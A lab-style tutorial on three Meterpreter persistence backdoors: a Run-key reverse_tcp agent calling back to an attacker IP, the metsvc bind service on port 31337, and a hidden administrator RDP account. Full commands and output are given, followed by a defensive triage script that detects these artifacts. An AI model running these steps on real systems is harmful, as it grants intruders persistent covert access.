Meterpreter backdoors

Method 1: the persistence script

meterpreter > run persistence -h
Meterpreter Script for creating a persistent backdoor on a target host.

OPTIONS:

    -A        Automatically start a matching multi/handler to connect to the agent
    -L <opt>  Location in target host where to write payload to, if none %TEMP% will be used.
    -P <opt>  Payload to use, default is windows/meterpreter/reverse_tcp.
    -S        Automatically start the agent on boot as a service (with SYSTEM privileges)
    -T <opt>  Alternate executable template to use
    -U        Automatically start the agent when the User logs on
    -X        Automatically start the agent when the system boots
    -h        This help menu
    -i <opt>  The interval in seconds between each connection attempt
    -p <opt>  The port on the remote host where Metasploit is listening
    -r <opt>  The IP of the system running Metasploit listening for the connect back

meterpreter >
Run it (start at boot, retry every 10 seconds, connect back to 192.168.111.129:2241):

meterpreter > run persistence -X -i 10 -p 2241 -r 192.168.111.129
[*] Running Persistance Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/WIN-K30V5SI0PCE_20140313.5419/WIN-K30V5SI0PCE_20140313.5419.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.111.129 LPORT=2241
[*] Persistent agent script is 148439 bytes long
[+] Persistent Script written to C:\Users\ADMINI~1\AppData\Local\Temp\UhyxOTTzTb.vbs
[*] Executing script C:\Users\ADMINI~1\AppData\Local\Temp\UhyxOTTzTb.vbs
[+] Agent executed with PID 2916
[*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\HstWtPyXHYnhQ
[+] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\HstWtPyXHYnhQ
meterpreter >


Now exit the session on the target and set the listener up again with the same payload, LHOST and LPORT:

msf > use multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.111.129
LHOST => 192.168.111.129
msf exploit(handler) > set LPORT 2241
LPORT => 2241
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.111.129:2241
[*] Starting the payload handler...
[*] Sending stage (769024 bytes) to 192.168.111.133
[*] Meterpreter session 1 opened (192.168.111.129:2241 -> 192.168.111.133:49159) at 2014-03-13 23:01:55 +0800
meterpreter >

Method 2: metsvc

meterpreter > run metsvc
[*] Creating a meterpreter service on port 31337
[*] Creating a temporary installation directory C:\Users\ADMINI~1\AppData\Local\Temp\HzWbqqRpuBlxn...
[*]  >> Uploading metsrv.x86.dll...
[*]  >> Uploading metsvc-server.exe...
[*]  >> Uploading metsvc.exe...
[*] Starting the service...
     * Installing service metsvc
     * Starting service
Service metsvc successfully installed.
meterpreter >


The metsvc backdoor is now installed; next, connect to it with the bind-TCP handler:


root@Kali:~# msfconsole 
=[ metasploit v4.8.1-2013120401 [core:4.8 api:1.0]
 + -- --=[ 1239 exploits - 755 auxiliary - 207 post
 + -- --=[ 324 payloads - 31 encoders - 8 nops

msf > use multi/handler
msf exploit(handler) > set PAYLOAD windows/metsvc_bind_tcp
PAYLOAD => windows/metsvc_bind_tcp
msf exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Payload options (windows/metsvc_bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process, none
   LPORT     4444             yes       The listen port
   RHOST                      no        The target address

Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

msf exploit(handler) > set RHOST 192.168.111.133
RHOST => 192.168.111.133
msf exploit(handler) > set LPORT 31337
LPORT => 31337
msf exploit(handler) > exploit

[*] Started bind handler
[*] Starting the payload handler...
[*] Meterpreter session 1 opened (192.168.111.129:49313 -> 192.168.111.133:31337) at 2014-03-13 23:12:54 +0800
meterpreter >

Method 3: in the same spirit, add an account and connect remotely over 3389 (RDP)

meterpreter > run getgui -u zero -p haizeiwang123_
[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
[*] Carlos Perez carlos_perez@darkoperator.com
[*] Setting user account for logon
[*]     Adding User: zero with Password: haizeiwang123_
[*]     Hiding user from Windows Login screen
[*]     Adding User: zero to local group 'Remote Desktop Users'
[*]     Adding User: zero to local group 'Administrators'
[*] You can now login with the created user
[*] For cleanup use command: run multi_console_command -rc /root/.msf4/logs/scripts/getgui/clean_up__20140314.4134.rc
meterpreter >
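From the defender's side, each of the three methods above leaves a distinct host artifact: an autorun value launching a script out of %TEMP%, a service named metsvc (with its binaries in a Temp directory and a listener on 31337), and an account hidden from the logon screen that sits in Administrators and Remote Desktop Users. The following triage script is an added example, not part of the original post or of Metasploit; its input data is constructed inline to mirror the output shown above, and the data layout and check functions are my own assumptions.

```python
"""Added example (not from the original post): triage host artifacts for the
traces the three Meterpreter persistence methods leave. All input data below is
constructed to mirror the post's output; the checks are the editor's own."""
import re

# Constructed Run-key values, services, listeners and local accounts.
RUN_KEYS = {
    "HstWtPyXHYnhQ": r"C:\Users\ADMINI~1\AppData\Local\Temp\UhyxOTTzTb.vbs",
    "SecurityHealth": r"C:\Windows\System32\SecurityHealthSystray.exe",
}
SERVICES = [
    {"name": "metsvc", "binpath": r"C:\Users\ADMINI~1\AppData\Local\Temp\HzWbqqRpuBlxn\metsvc.exe"},
    {"name": "Spooler", "binpath": r"C:\Windows\System32\spoolsv.exe"},
]
LISTENING_PORTS = {31337: "metsvc-server.exe", 3389: "svchost.exe"}
USERS = [
    {"name": "zero", "hidden": True, "groups": {"Administrators", "Remote Desktop Users"}},
    {"name": "alice", "hidden": False, "groups": {"Users"}},
]

# A script interpreter target living directly under a Temp directory.
TEMP_SCRIPT = re.compile(r"\\Temp\\[^\\]+\.(vbs|bat|ps1|js)$", re.IGNORECASE)

def check_run_keys(run_keys):
    """Method 1: autorun values that launch a script straight out of %TEMP%."""
    return [(name, path) for name, path in run_keys.items() if TEMP_SCRIPT.search(path)]

def check_services(services, ports):
    """Method 2: the metsvc service name, a service binary under Temp, or the
    default metsvc port (31337) with a listener bound to it."""
    hits = [s["name"] for s in services
            if s["name"].lower() == "metsvc" or "\\Temp\\" in s["binpath"]]
    if 31337 in ports:
        hits.append(f"port 31337 ({ports[31337]})")
    return hits

def check_users(users):
    """Method 3: accounts hidden from the logon screen that can still reach the
    box over RDP or hold local admin rights."""
    return [u["name"] for u in users
            if u["hidden"] and {"Administrators", "Remote Desktop Users"} & u["groups"]]

def triage():
    """Run all three checks and return the findings per category."""
    return {"run_keys": check_run_keys(RUN_KEYS),
            "services": check_services(SERVICES, LISTENING_PORTS),
            "users": check_users(USERS)}

if __name__ == "__main__":
    for category, hits in triage().items():
        print(f"{category}: {hits or 'clean'}")
```

The persistence and getgui scripts both write a cleanup .rc file (paths shown in the output above); on a real host the equivalent inputs come from the Run keys, the service control manager, netstat and the local user/group listings.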